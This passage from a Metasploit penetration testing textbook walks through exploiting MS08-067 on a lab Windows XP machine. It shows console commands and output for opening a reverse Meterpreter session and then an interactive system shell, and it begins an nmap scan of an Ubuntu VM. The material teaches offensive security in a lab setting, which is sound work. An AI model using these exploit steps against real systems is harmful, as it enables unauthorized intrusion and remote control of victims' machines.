68
Chapter 5
Having set the stage, we’re ready to conduct the actual exploitation:
msf exploit(ms08_067_netapi) >
exploit
[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)
msf exploit(ms08_067_netapi) >
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter 192.168.33.129:8080 -> 192.168.33.130:1036
msf exploit(ms08_067_netapi) >
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
shell
Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
The
exploit
command at initiates our exploit and attempts to attack
the target. The attack succeeds and gives us a
reverse_tcp
Meterpreter pay-
load at , which we can view with
sessions -l
at . Only one session is active,
as shown at , but if we targeted multiple systems, several sessions could be
open simultaneously. (To view a list of the exploits that created each session,
you would enter
sessions -l -v
.)
The
sessions -i 1
command is issued at to “interact” with an individual
session. Notice that this drops us into a Meterpreter shell. If, for example, a
reverse command shell existed, this command would drop us straight to a
command prompt. And, finally, at we enter
shell
to jump into an interac-
tive command shell on the target.
Congratulations! You’ve just compromised your first machine! To list the
available commands for a particular exploit, you can enter
show options
.
Exploiting an Ubuntu Machine
Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are
pretty much the same as for the preceding exploit except that we will select a
different payload.
msf >
nmap -sT -A -P0 192.168.33.132
[*] exec: nmap -sT -A -P0 192.168.33.132